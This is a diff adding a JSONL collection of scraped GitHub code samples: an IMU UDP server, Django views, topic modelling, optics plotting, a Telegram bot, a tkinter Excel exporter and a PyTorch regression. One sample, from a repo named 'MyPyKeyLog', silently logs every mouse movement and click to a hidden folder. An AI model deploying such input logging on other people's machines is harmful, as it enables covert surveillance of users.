diff --git "a/4259.jsonl" "b/4259.jsonl" new file mode 100644--- /dev/null +++ "b/4259.jsonl" @@ -0,0 +1,849 @@ +{"seq_id":"26589952813","text":"import subprocess\nimport time\nimport socket\nimport threading\nimport Config\nfrom ImuClient import ImuClient\n\nPORT_CLIENT = 6001\nPORT_SERVER = 6002\nimu_data = ''\n\ndef ProcessImu():\n imu_client = ImuClient()\n global imu_data\n\n while True:\n time.sleep(0.01)\n (ax, ay, az), (ox, oy, oz) = imu_client.data\n imu_data = ','.join(str(i) for i in [ax, ay, az, ox, oy, oz])\n\nif __name__ == '__main__':\n thread = threading.Thread(target=ProcessImu)\n thread.start()\n\n with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:\n s.bind((Config.IP_ADDRESS, PORT_SERVER))\n\n print('waiting...')\n\n while True:\n # クライアントから何かしら送られてくるまで待機\n s.recvfrom(Config.BUFFER_SIZE)\n\n # IMUのデータを送る\n s.sendto(\n imu_data.encode(),\n (Config.IP_ADDRESS, PORT_CLIENT)\n )\n print(imu_data)\n","repo_name":"TakutoJibiki/ninja-scan-light-imu","sub_path":"UnityServer.py","file_name":"UnityServer.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"70408212758","text":"from pynput import mouse\nimport logging\nimport time\nimport os\nfrom datetime import datetime\n\nDATE_FILE = datetime.now().strftime('%d%m%Y')\nDATE_LOG = datetime.now().strftime('%d/%m/%Y %H:%M')\nBASE_DIR = os.path.abspath(os.path.dirname(__file__))\n\nif os.path.exists(f'{BASE_DIR}/.logs/') == False:\n os.mkdir(f'{BASE_DIR}/.logs/')\n\nlogging.basicConfig(filename=f\"{BASE_DIR}/.logs/mouse_log_{DATE_FILE}.log\", level=logging.DEBUG, format=\"%(asctime)s: %(message)s\")\n\ndef on_move(x, y):\n logging.info(f\"Mouse moveu para {x, y}\")\n\ndef on_click(x, y, button, pressed):\n if pressed:\n logging.info(f\"Mouse clicou em {x, y, button}\")\n\ndef on_scroll(x, y, dx, dy):\n logging.info(f\"Mouse scrolled em {x, y, dx, dy}\")\n\na = mouse.Listener()\n\nwith mouse.Listener(on_move=on_move, on_click=on_click, on_scroll=on_scroll) as listener:\n listener.join()\n","repo_name":"dhanielsales/MyPyKeyLog","sub_path":"MouseOnlyLogger.py","file_name":"MouseOnlyLogger.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"9466773877","text":"from django.template import RequestContext\nfrom django.views.generic import DeleteView\nfrom django.core.urlresolvers import reverse\nfrom django.core.files.base import ContentFile\nfrom django.core.files.storage import default_storage\nfrom django.shortcuts import redirect, render_to_response\nfrom django.contrib.auth.decorators import login_required\n\nfrom buddy.utils import datetime_string\n\nfrom image.models import ImageRequest\nfrom image.forms import ImageRequestForm, ImageOfferForm\n\nclass DeleteImageView(DeleteView):\n model = ImageRequest\n success_url = \"/\" \n\n@login_required\ndef request_image(request):\n form = ImageRequestForm(request.POST or None)\n\n if form.is_valid():\n instance = form.instance\n instance.user = request.user\n instance.save()\n \n return redirect(reverse('index'))\n\n return render_to_response('image/imagerequest_form.html',\n {'form':form},\n context_instance=RequestContext(request))\n\n@login_required\ndef offer_image(request):\n if request.method == \"POST\":\n form = ImageOfferForm(request.POST, request.FILES)\n \n if form.is_valid():\n file = form.cleaned_data['image']\n\n instance = form.instance\n instance.request = 
ImageRequest.objects.get(pk=request.POST['request'])\n instance.user = request.user\n instance.image.save(\"%s-%s\" % (datetime_string(), file.name), ContentFile(file.read()))\n io = instance.save()\n\n return redirect(reverse('index'))\n else:\n return render_to_response('image/imageoffer_form.html',\n {'form':form},\n context_instance=RequestContext(request))\n\n else:\n form = ImageOfferForm()\n return render_to_response('image/imageoffer_form.html',\n {'form':form},\n context_instance=RequestContext(request))\n\n","repo_name":"buddylindsey/photo-blogger","sub_path":"image/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"26462487262","text":"\r\nimport pandas as pd\r\nimport re\r\nimport nltk\r\nimport time\r\nimport matplotlib.pyplot as plt\r\nfrom PIL import Image\r\nfrom pyLDAvis import display\r\nimport pyLDAvis.gensim_models as gensimvis\r\nfrom nltk.stem import WordNetLemmatizer, SnowballStemmer\r\nfrom gensim.utils import simple_preprocess\r\nfrom gensim.parsing.preprocessing import STOPWORDS\r\nfrom gensim import corpora, models\r\nfrom wordcloud import WordCloud\r\nfrom matplotlib import colors as mcolors\r\nfrom read_data import read_data\r\n\r\n\r\n# Preprocess text data\r\n# Define the regular expression patterns\r\npattern1 = r'^(c-\\d+-\\d+)\\s+X\\s+(.*)$'\r\npattern2 = r'^(readme-\\d+)\\s+X\\s+(.*)$'\r\ndf1, df2 = read_data(pattern1, pattern2)\r\n\r\n\r\ndef preprocess_text(text):\r\n result = []\r\n stemmer = SnowballStemmer(language='english')\r\n lemmatizer = WordNetLemmatizer()\r\n\r\n for token in simple_preprocess(text):\r\n if token not in STOPWORDS and len(token) > 3:\r\n stemmed_token = stemmer.stem(lemmatizer.lemmatize(token, pos='v'))\r\n result.append(stemmed_token)\r\n\r\n return result\r\n\r\n# Read and preprocess data\r\n\r\n\r\ndef preprocess_data(df, text_column):\r\n documents = df[text_column].map(preprocess_text)\r\n return documents\r\n\r\n# Visualize topic modeling\r\n\r\n\r\ndef visualize_topics(lda_model, corpus, dictionary):\r\n lda_display = gensimvis.prepare(\r\n lda_model, corpus, dictionary, sort_topics=False)\r\n display(lda_display)\r\n\r\n# Build LDA model\r\n\r\n\r\ndef build_lda_model(documents, num_topics):\r\n dictionary = corpora.Dictionary(documents)\r\n corpus = [dictionary.doc2bow(doc) for doc in documents]\r\n lda_model = models.LdaModel(\r\n corpus, num_topics=num_topics, id2word=dictionary, passes=10, alpha='auto', eta='auto')\r\n return lda_model, corpus, dictionary\r\n\r\n\r\n# Output A) Parameters, B) Parameters, and N) Parameters\r\ndef output_model_parameters(lda_model):\r\n alpha = lda_model.alpha[0]\r\n beta = lda_model.eta[0]\r\n num_topics = lda_model.num_topics\r\n\r\n time.sleep(1)\r\n\r\n return alpha, beta, num_topics\r\n\r\n\r\n# Wordcloud of Top N words in each topic\r\n\r\n\r\ndef visualize_wordcloud(lda_model):\r\n cols = [color for name, color in mcolors.TABLEAU_COLORS.items()]\r\n stop_words = STOPWORDS\r\n\r\n cloud = WordCloud(stopwords=stop_words,\r\n background_color='white',\r\n width=2500,\r\n height=1800,\r\n max_words=10,\r\n colormap='tab10',\r\n color_func=lambda *args, **kwargs: cols[i],\r\n prefer_horizontal=1.0)\r\n\r\n topics = lda_model.show_topics(formatted=False)\r\n\r\n fig, axes = plt.subplots(2, 2, figsize=(10, 10), sharex=True, sharey=True)\r\n\r\n for i, ax in enumerate(axes.flatten()):\r\n fig.add_subplot(ax)\r\n topic_words = dict(topics[i][1])\r\n 
cloud.generate_from_frequencies(topic_words, max_font_size=300)\r\n plt.gca().imshow(cloud)\r\n plt.gca().set_title('Topic ' + str(i), fontdict=dict(size=16))\r\n plt.gca().axis('off')\r\n\r\n plt.ion()\r\n plt.subplots_adjust(wspace=0, hspace=0)\r\n plt.axis('off')\r\n plt.margins(x=0, y=0)\r\n plt.tight_layout()\r\n plt.savefig('plot.png')\r\n open_plot_image('plot.png')\r\n\r\n\r\ndef open_plot_image(filename):\r\n img = Image.open(filename)\r\n img.show()\r\n","repo_name":"Priyanka2345/HIS_Project","sub_path":"model_.py","file_name":"model_.py","file_ext":"py","file_size_in_byte":3323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"36334639137","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 9 17:08:35 2021\n\n@author: jakravit\n\"\"\"\nimport os\nimport numpy as np\nimport pandas as pd\nimport pickle\nimport matplotlib.pyplot as plt\nimport statsmodels.api as sm\n\nstrampath = '/Users/jakravit/git/EAP/data/final_ranges/stramski/'\nvcourtpath = '/Users/jakravit/git/EAP/data/final_ranges/vcourt/'\n\nstramlist = os.listdir(strampath)\nvcourtlist = os.listdir(vcourtpath)\n\ndef get_phytos(plist,ppath): \n phytos = {}\n for phy in plist:\n if phy.startswith('.'):\n continue\n fpath = ppath + phy\n with open(fpath, 'rb') as fp:\n data = pickle.load(fp)\n phytos[phy] = data\n return phytos\n\nstramphy = get_phytos(stramlist, strampath)\nvcourtphy = get_phytos(vcourtlist, vcourtpath)\n\n#%%\nl1 = np.arange(400,905,5)\nl2 = np.arange(400,901,1)\nl3 = np.array([440,470,510,620])\n# lac9 = np.array([412,440,488,510,532,555,620,650,676,715])\n# lhs6 = np.array([442,488,532,555,620,676])\n\nclasses = {'Bacillariophyceae': {'wtruth':[],'struth':[],'vtruth':[],'data':[],'vg':[],'ci':[],'nshell':[],'deff':[],'sp':[]},\n 'Chlorophyceae': {'wtruth':[],'struth':[],'vtruth':[],'data':[],'vg':[],'ci':[],'nshell':[],'deff':[],'sp':[]},\n 'Coscinodiscophyceae': {'wtruth':[],'struth':[],'vtruth':[],'data':[],'vg':[],'ci':[],'nshell':[],'deff':[],'sp':[]},\n 'Cryptophyceae': {'wtruth':[],'struth':[],'vtruth':[],'data':[],'vg':[],'ci':[],'nshell':[],'deff':[],'sp':[]},\n 'Cyanophyceae': {'wtruth':[],'struth':[],'vtruth':[],'data':[],'vg':[],'ci':[],'nshell':[],'deff':[],'sp':[]},\n 'Dinophyceae': {'wtruth':[],'struth':[],'vtruth':[],'data':[],'vg':[],'ci':[],'nshell':[],'deff':[],'sp':[]},\n 'Fragilariophyceae': {'wtruth':[],'struth':[],'vtruth':[],'data':[],'vg':[],'ci':[],'nshell':[],'deff':[],'sp':[]},\n 'Pelagophyceae': {'wtruth':[],'struth':[],'vtruth':[],'data':[],'vg':[],'ci':[],'nshell':[],'deff':[],'sp':[]},\n 'Prasinophyceae': {'wtruth':[],'struth':[],'vtruth':[],'data':[],'vg':[],'ci':[],'nshell':[],'deff':[],'sp':[]},\n 'Prymnesiophyceae': {'wtruth':[],'struth':[],'vtruth':[],'data':[],'vg':[],'ci':[],'nshell':[],'deff':[],'sp':[]},\n 'Raphidophyceae': {'wtruth':[],'struth':[],'vtruth':[],'data':[],'vg':[],'ci':[],'nshell':[],'deff':[],'sp':[]},\n 'Rhodophyceae': {'wtruth':[],'struth':[],'vtruth':[],'data':[],'vg':[],'ci':[],'nshell':[],'deff':[],'sp':[]},\n 'Haptophyceae': {'wtruth':[],'struth':[],'vtruth':[],'data':[],'vg':[],'ci':[],'nshell':[],'deff':[],'sp':[]}, \n 'Eustigmatophyceae': {'wtruth':[],'struth':[],'vtruth':[],'data':[],'vg':[],'ci':[],'nshell':[],'deff':[],'sp':[]} \n }\n\ndef get_classes(classes,data,p):\n for phyto in data:\n c = data[phyto]['class']\n for sname in data[phyto][p].index:\n info = sname.split('_')\n classes[c]['vg'].append(float(info[0]))\n 
classes[c]['ci'].append(float(info[1]))\n classes[c]['nshell'].append(float(info[2]))\n classes[c]['sp'].append(phyto)\n if len(info) == 4:\n classes[c]['deff'].append(float(info[3]))\n else:\n classes[c]['deff'].append(float(info[4]))\n classes[c]['data'].append(data[phyto][p].loc[sname,:])\n return classes\n\np = 'a'\nclasses = get_classes(classes,stramphy,p)\nclasses = get_classes(classes,vcourtphy,p)\nwith open('/Users/jakravit/Desktop/astar_classes.p', 'wb') as fp:\n pickle.dump(classes,fp)\np = 'b'\nclasses = get_classes(classes,stramphy,p)\nclasses = get_classes(classes,vcourtphy,p)\nwith open('/Users/jakravit/Desktop/bstar_classes.p', 'wb') as fp:\n pickle.dump(classes,fp)\np = 'bb'\nclasses = get_classes(classes,stramphy,p)\nclasses = get_classes(classes,vcourtphy,p)\nwith open('/Users/jakravit/Desktop/bbstar_classes.p', 'wb') as fp:\n pickle.dump(classes,fp)\n \n#%%\n# stramski validation data\nwith open('/Users/jakravit/git/EAP/data/val/stram_optics.p', 'rb') as fp:\n stram_val = pickle.load(fp) \nfor code in stram_val:\n if code in ['hbac','viru']:\n continue\n info = stram_val[code]\n cl = info['Class']\n classes[cl]['struth'].append(info[p])\n\n# vcourt validation data\npath = '/Users/jakravit/git/EAP/data/val/'\ncourt_val = {'a': pd.read_csv(path + 'vcourt_a.csv'),\n 'b': pd.read_csv(path + 'vcourt_b.csv'),\n 'bb':pd.read_csv(path + 'vcourt_bb.csv'),\n }\nvdata = court_val[p]\ngroups = vdata.groupby('Class')\nfor gi,gd in groups:\n # if gi in ['Eustigmatophyceae']:\n # continue\n classes[gi]['vtruth'].append(gd.iloc[:,2:].values)\n\n# whitmire validation data\n# path = '/Users/jakravit/git/EAP/data/val/'\n# whit_val = {'a': pd.read_csv(path + 'whit_a_subset.csv'),\n# 'b': pd.read_csv(path + 'whit_b_subset.csv'),\n# 'bb':pd.read_csv(path + 'whit_bb_subset.csv'),\n# }\n# wdata = whit_val[p]\n# groups = wdata.groupby('Class')\n# for gi,gd in groups:\n# classes[gi]['wtruth'] = gd.iloc[:,4:].div(gd.Chl,axis=0)\n\n# concat data groups\nfor c in classes:\n classes[c]['data'] = pd.concat(classes[c]['data'],axis=1).T\n \n# concat truth groups\nfor c in classes:\n if len(classes[c]['vtruth']): \n if p == 'bb':\n col = l3\n else:\n col = l2\n classes[c]['vtruth'] = pd.DataFrame(np.vstack((classes[c]['vtruth'])),columns=col)\n\nfor c in classes:\n if len(classes[c]['struth']):\n classes[c]['struth'] = pd.DataFrame(np.vstack((classes[c]['struth'])),columns=l2)\n\n# for c in classes:\n# if len(classes[c]['wtruth']): \n# if p == 'bb':\n# col = lhs6\n# else:\n# col = lac9\n# classes[c]['wtruth'].columns = col\n \n#%%\nimport matplotlib.pylab as pylab\nparams = {'legend.fontsize': 'small',\n 'axes.labelsize': 18,\n 'axes.titlesize': 24,\n 'xtick.labelsize': 13,\n 'ytick.labelsize': 13\n }\npylab.rcParams.update(params)\n\nfig, axs = plt.subplots(4,4,figsize=(20,20), sharex=True, sharey=True)\naxs = axs.ravel()\ncount = 0\n\nif p in ['a','b']:\n for c in classes:\n print (c)\n res = sm.graphics.fboxplot(classes[c]['data'].values, l1, wfactor=1000, ax=axs[count])\n if not isinstance(classes[c]['vtruth'], list): \n classes[c]['vtruth'].T.plot(ax=axs[count],color='b',legend=False)\n if not isinstance(classes[c]['struth'], list):\n classes[c]['struth'].T.plot(ax=axs[count],color='r',legend=False)\n # if not isinstance(classes[c]['wtruth'], list):\n # classes[c]['wtruth'].T.plot(ax=axs[count],color='g',ls='--',marker='o',legend=False)\n axs[count].set_title(c)\n if p == 'b':\n axs[count].set_ylim(0,.7)\n else:\n axs[count].set_ylim(0,.1)\n axs[count].set_xlim(400,800)\n count = count+1\n \nelse:\n 
for c in classes:\n print (c)\n res = sm.graphics.fboxplot(classes[c]['data'].values, l1, wfactor=1000, ax=axs[count])\n if not isinstance(classes[c]['vtruth'], list): \n classes[c]['vtruth'].T.plot(ax=axs[count],color='b',ls='--',marker='o', legend=False)\n if not isinstance(classes[c]['struth'], list):\n classes[c]['struth'].T.plot(ax=axs[count],color='r',legend=False)\n # if not isinstance(classes[c]['wtruth'], list):\n # classes[c]['wtruth'].T.plot(ax=axs[count],color='g',ls='--',marker='o',legend=False)\n axs[count].set_title(c)\n axs[count].set_ylim(0,.01)\n axs[count].set_xlim(400,800)\n count = count+1 \n \nplt.subplots_adjust(hspace=.2,wspace=.1)\nfig.savefig('/Users/jakravit/Desktop/{}.png'.format(p),bbox_inches='tight',dpi=300)\n\n\n#%%\nfig, axs = plt.subplots(1,4, figsize=(15,7),sharey=True)\naxs = axs.ravel()\nfor i,v in enumerate(['deff','ci','vg','nshell']):\n df = {}\n for c in classes:\n df[c] = classes[c][v] \n axs[i].boxplot(df.values(),vert=False,whis=1.5)\naxs[0].set_yticks(range(1,len(df.keys())+1))\naxs[0].set_yticklabels(df.keys())\naxs[0].set_xlabel(u'Deff (\\u03bcm)')\naxs[1].set_xlabel('Ci (kgm$^{-3}$)')\naxs[2].set_xlabel('Vg (%)')\naxs[3].set_xlabel('n_shell')\nplt.subplots_adjust(wspace=.1)\nfig.savefig('/Users/jakravit/Desktop/2layer_params.png',bbox_inches='tight',dpi=300)\n\n\n","repo_name":"JAKravitz/EAPtesting","sub_path":"scripts/class_plot.py","file_name":"class_plot.py","file_ext":"py","file_size_in_byte":8368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"5257679846","text":"import asyncio\nimport logging\nfrom aiogram import Bot, Dispatcher, types\nfrom aiogram.filters import Command\nimport config\nimport sqlite3\n\n\nconnect = sqlite3.connect('data.db')\ncursor = connect.cursor()\n\ncursor.execute('''SELECT * FROM parsing_data''')\ndata = cursor.fetchall()\n\nartist_dict = {}\ndata_dict = {}\n\nfor i in data:\n if i[0] not in artist_dict:\n artist_dict[i[0]] = i[1]\n\n data_dict[i[2]] = [i[0], i[3], i[5], i[6], i[7], i[8], i[9], i[10], i[4]]\n\n\n# Включаем логирование, чтобы не пропустить важные сообщения\nlogging.basicConfig(level=logging.INFO)\n\nbot = Bot(token=config.TOKEN)\ndp = Dispatcher()\n\n\n@dp.message(Command(\"start\"))\nasync def cmd_start(message: types.Message):\n kb = []\n for artist in artist_dict:\n kb.append([types.KeyboardButton(text=artist)])\n keyboard = types.ReplyKeyboardMarkup(keyboard=kb, resize_keyboard=True)\n await message.answer(\"Выбирите артиста\", reply_markup=keyboard)\n\n\n@dp.message()\nasync def button(message: types.Message):\n kb = []\n if message.text in artist_dict: # проверяем есть ли введёный артист в словаре\n for position in data_dict: # перебираем все товары\n print(position)\n if position != None and data_dict[position][0] == message.text:\n # создаём кнопку с именем товара\n kb.append([types.KeyboardButton(text=position)])\n kb.append([types.KeyboardButton(text='Домой')])\n keyboard = types.ReplyKeyboardMarkup(keyboard=kb, resize_keyboard=True)\n await message.answer(f'Выбери шмот', reply_markup=keyboard)\n\n elif message.text == 'Домой':\n await cmd_start(message)\n\n elif message.text in data_dict:\n for product in data_dict:\n if product == message.text:\n price = data_dict[message.text][2]\n type_product = data_dict[message.text][3]\n color = data_dict[message.text][4]\n structur = data_dict[message.text][5]\n application_chest = data_dict[message.text][6]\n application_back = data_dict[message.text][7]\n img = 
data_dict[message.text][8]\n\n mes = f'Товар: {product}\\nЦена: {price}руб.\\n{type_product}\\n{color}\\n{structur}\\n{application_chest}\\n{application_back}'\n while 'None' in mes:\n mes = mes.replace('None', '')\n await message.answer(mes, parse_mode='HTML')\n else:\n await message.answer('Ты говоришь на непонятном мне языке')\n\n\nasync def main():\n await dp.start_polling(bot)\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n","repo_name":"KASSAS20/GLAM_GO_SHMOT","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"43045532779","text":"import os\n\n# os.mkdir('11') # 创建文件\n# os.removedirs('11') # 删除文件\n# print(os.listdir('./')) # 以列表形式列出当前路径中的文件,目录\n# print(os.getcwd()) # 列出当前路径\n\nprint(os.path.exists('b')) # 判断b文件是否存在,False表示不存在\n# 判断是否存在b文件,如果文件不存在,则创建文件夹\nif not os.path.exists('b'):\n os.mkdir('b')\n# 判断b下面有没有test.txt文件,如果没有,则打开文件,写入\n# if 后面为True时,才会执行下面的语句块\nif not os.path.exists('b/test.txt'):\n f = open('b/test.txt', 'w')\n f.write('hello,python')\n f.close()\n","repo_name":"Chan0619/FIS03","sub_path":"python/python标准库os.py","file_name":"python标准库os.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"4568170975","text":"\"\"\"\r\nCopyright (c) 2016 S-BEAT GbR and others\r\n\r\nThis file is part of S-BEAT.\r\n\r\nS-BEAT is free software: you can redistribute it and/or modify\r\nit under the terms of the GNU General Public License as published by\r\nthe Free Software Foundation, either version 3 of the License, or\r\n(at your option) any later version.\r\n\r\nS-BEAT is distributed in the hope that it will be useful,\r\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\r\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\nGNU General Public License for more details.\r\n\r\nYou should have received a copy of the GNU General Public License\r\nalong with S-BEAT. 
If not, see .\r\n\"\"\"\r\n\r\nfrom Db import DBDocument\r\nimport hashlib\r\nimport struct\r\n\r\n\r\nclass Query(DBDocument):\r\n \"\"\"\r\n The Query tells where to find a value.\r\n \"\"\"\r\n\r\n collection_name = 'queries'\r\n cached_items = {}\r\n\r\n def __init__(self, q=None, name=None, category=None, formatting='auto', query_type='dict', success=False,\r\n depends=None, ignore=False):\r\n self.name = name # the query description\r\n self.category = category # category of the query\r\n self.formatting = formatting # formatting: int, float:2, date, grade, semester, yesno\r\n self.query_type = query_type # Type of query: dict,call\r\n self.q = q # Query value could be a path to the needed resource\r\n self.success = success # Is this query relevant for success\r\n self.depends = depends # list of PathElements which are required before this can be used\r\n self.ignore = ignore # Ignore this query for path generation\r\n self._id = None # Databse ID if available, is calculated automatically on save with md5_id()\r\n self.auto_generate = False # should the conditions be generated automatically\r\n\r\n def __eq__(self, other):\r\n return isinstance(other, type(self)) and \\\r\n (self.query_type, self.q) == \\\r\n (other.query_type, other.q)\r\n\r\n def md5(self):\r\n m = hashlib.md5()\r\n m.update(self.query_type)\r\n m.update(self.q)\r\n return m.digest()\r\n\r\n def md5_id(self):\r\n return struct.unpack('>q', '\\0\\0' + self.md5()[10:16])[0]\r\n\r\n def __hash__(self):\r\n return hash(self.md5())\r\n\r\n def run(self, data):\r\n if self.q in data:\r\n return data[self.q]\r\n else:\r\n return select_by_path(self.q.split('.'), data)\r\n\r\n def get_dict(self, str_ids=False, replace_vars=None):\r\n data = self.__dict__.copy()\r\n if str_ids:\r\n if isinstance(self.depends, set):\r\n data['depends'] = list()\r\n for pe_id in self.depends:\r\n data['depends'].append(str(pe_id))\r\n\r\n if replace_vars is not None:\r\n for key, val in replace_vars.iteritems():\r\n data['name'] = data['name'].replace(key, val)\r\n data['category'] = data['category'].replace(key, val)\r\n\r\n return data\r\n\r\n def get_str(self):\r\n return self.q\r\n\r\n def get_depends_elements(self):\r\n import DataDefinitions\r\n\r\n result = set()\r\n if self.depends is None:\r\n return result\r\n for el_id in self.depends:\r\n el = DataDefinitions.get_element_by_hash(el_id)\r\n if el is not None:\r\n result.add(el)\r\n return result\r\n\r\n @staticmethod\r\n def from_dict(data):\r\n q = Query()\r\n q.name = data['name']\r\n q.category = data['category']\r\n q.formatting = data['formatting']\r\n q.query_type = data['query_type']\r\n q.q = data['q']\r\n q.success = data['success']\r\n q.depends = data['depends']\r\n if isinstance(q.depends, list):\r\n q.depends = set(q.depends)\r\n q.ignore = data['ignore']\r\n if '_id' in data:\r\n q._id = data['_id']\r\n if 'auto_generate' in data:\r\n q.auto_generate = data['auto_generate']\r\n return q\r\n\r\n def __repr__(self):\r\n return 'Query(' + repr(self.q) + ')'\r\n\r\n def db_transform(self):\r\n \"\"\"\r\n Transforms self to a database dictionary object.\r\n Gets called by transform_incoming of SONManipulator\r\n \"\"\"\r\n\r\n data = self.get_dict().copy()\r\n if isinstance(data['depends'], set):\r\n data['depends'] = list(data['depends'])\r\n data['_id'] = self.md5_id()\r\n return data\r\n\r\n @staticmethod\r\n def db_create(son):\r\n \"\"\"\r\n Creates a new Instance based of database SON data.\r\n Gets called by transform_outgoing of SONManipulator\r\n \"\"\"\r\n 
return Query.from_dict(son)\r\n\r\n @classmethod\r\n def find_by_id(cls, query_id):\r\n return cls.find_one({'_id': query_id})\r\n\r\n # if query_id in cls.cached_items:\r\n # return cls.cached_items[query_id]\r\n # else:\r\n # cls.cached_items[query_id] = cls.find_one({'_id': query_id})\r\n # return cls.cached_items[query_id]\r\n\r\n\r\ndef select_by_path(path, data):\r\n d = data\r\n for attr in path:\r\n if d is not None and attr in d:\r\n d = d[attr]\r\n else:\r\n return None\r\n return d\r\n","repo_name":"sbeat/s-beat","sub_path":"lib/DB/Query.py","file_name":"Query.py","file_ext":"py","file_size_in_byte":5232,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"85"} +{"seq_id":"17837983945","text":"import argparse\nimport json\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-i', default='greg_search.log')\nparser.add_argument('-o', default='greg_search.json')\nargs = parser.parse_args()\n\nf = open(args.i).readlines()\nperf_tup = [(l.split(': ')[0].strip(), [float(m) for m in eval(l.split(': ')[1])]) for l in f]\nperf_tup = sorted(perf_tup, key=lambda x: x[1][1], reverse=True)\n\njson.dump(dict(perf_tup), open(args.o, 'w+'), sort_keys=False, indent=2, ensure_ascii=True)","repo_name":"UAlberta-NLP/v-wsd","sub_path":"greg_sort.py","file_name":"greg_sort.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"85"} +{"seq_id":"18116380281","text":"\"\"\" \n可视化操作界面\n\"\"\"\n\nimport tkinter\nfrom Utils import Utils\nfrom os import path\nfrom excel2json import Excel2Json\nfrom Utils import XLSX_ROOT, OUTPUT_ROOT\n\n# 创建主窗口\nwin = tkinter.Tk()\n\nwin.title('导表工具')\nwin.geometry('800x500+200+200')\nwin.minsize(800, 500)\nwin.maxsize(1100, 600)\n\n# 所有的xlsx文件\nxlsxRoot = XLSX_ROOT\nfiles = Utils.readFileList(xlsxRoot)\n# 导出路径\noutputRoot = OUTPUT_ROOT\n\n# 创建列表\nlistbox = tkinter.Listbox(win, font=(\"微软雅黑\", 12), height=20)\nlistbox.pack(fill='both', padx=20)\nfor i,file in enumerate(files):\n listbox.insert(i, file)\n\n\n# 导出所有\ndef exportAllFunc():\n print('print all')\n for file in files:\n filePath = path.normpath(path.join(xlsxRoot, file))\n excel2Json = Excel2Json(filePath, outputRoot)\n excel2Json.readFile()\n\nonekeyBtn = tkinter.Button(win, text='导出所有', width=20, font=(None,15), command=exportAllFunc)\nonekeyBtn.pack(side='right')\n\n# 选中导出\ndef exportSelectFunc():\n selectItem = listbox.curselection()\n if not selectItem:\n print('select error, please select one item!!!')\n return\n txt = listbox.get(selectItem) #选中的内容\n selectItemPath = path.normpath(path.join(xlsxRoot, txt))\n print('print selected: ', selectItemPath)\n excel2Json = Excel2Json(selectItemPath, outputRoot)\n excel2Json.readFile()\n\nsingleBtn = tkinter.Button(win, text='导出选中', width=20, font=(None,15), command=exportSelectFunc)\nsingleBtn.pack(side='left')\n\n# 显示窗口\nwin.mainloop()\n","repo_name":"zhengpj95/excel2json","sub_path":"src/maingui.py","file_name":"maingui.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"21828504867","text":"from __future__ import annotations\n\nfrom dxtbx.model import ExperimentList\n\nfrom xia2.Schema import compare_geometries, load_reference_geometries\n\n\ndef test_load_reference_geometries(dials_data):\n \"\"\"\n Test `xia2.Schema.load_reference_geometries`.\n\n Test the function that finds the set of unique instrument models from a list\n of 
experiment list files.\n\n There are eight input instrument models, of which only two are unique.\n \"\"\"\n files = [\"scaled_20_25.expt\", \"scaled_30.expt\", \"scaled_35.expt\"]\n files = [dials_data(\"l_cysteine_4_sweeps_scaled\", pathlib=True) / f for f in files]\n files.append(dials_data(\"l_cysteine_dials_output\", pathlib=True) / \"indexed.expt\")\n\n num_input = sum(len(ExperimentList.from_file(f, check_format=False)) for f in files)\n assert num_input == 8, \"Expected to find eight experiments, one for each sweep.\"\n\n unique_geometries = load_reference_geometries(files)\n assert len(unique_geometries) == 2, \"Expected to find two unique instrument models.\"\n\n detectors = (geom[\"detector\"] for geom in unique_geometries)\n assert not compare_geometries(*detectors), \"Unique detectors cannot be equivalent.\"\n","repo_name":"xia2/xia2","sub_path":"tests/Schema/test_Schema.py","file_name":"test_Schema.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"85"} +{"seq_id":"16012348261","text":"import torch \nimport torchvision\n\n# srt = torchvision.datasets.MNIST()\n\n# pytorch构建线性回归\n# x_data = np.array([[1.0],[2.0],[3.0]])\n# y_data = np.array([[2.0],[4.0],[6.0]])\n\nx_data = torch.tensor([[1.0],[2.0],[3.0]]) # 构建张量\ny_data = torch.tensor([[2.0],[4.0],[6.0]])\n\nclass LinearModel(torch.nn.Module): # module会自动帮你实现反向过程 所以不需要自己实现bp\n def __init__(self):\n super().__init__()\n self.linear = torch.nn.Linear(1,1) # Linear是一个类 里面包含了 权重和偏置 linear是一个对象\n\n \n def forward(self, x):\n y_pred = self.linear(x)\n return y_pred\n\n\nmodel = LinearModel()\ncriterion = torch.nn.MSELoss(size_average=False) # 参数是否求均值 reduce看是否降维\noptimizer = torch.optim.SGD(model.parameters(), lr=0.01) # parameters 会将所有需要优化的都放进去 lr学习率\n\n\n# 相当于训练过程\nfor epoch in range(200):\n y_pred = model(x_data) # 1. 算出y的预测值\n loss = criterion(y_pred, y_data) # 2. y_pred - y 算出loss\n # print('y_pred : ', y_pred)\n # print('loss : ', loss)\n \n\n optimizer.zero_grad() # 3. 梯度清零\n loss.backward() # 4. 反向传播\n optimizer.step() # 5. 
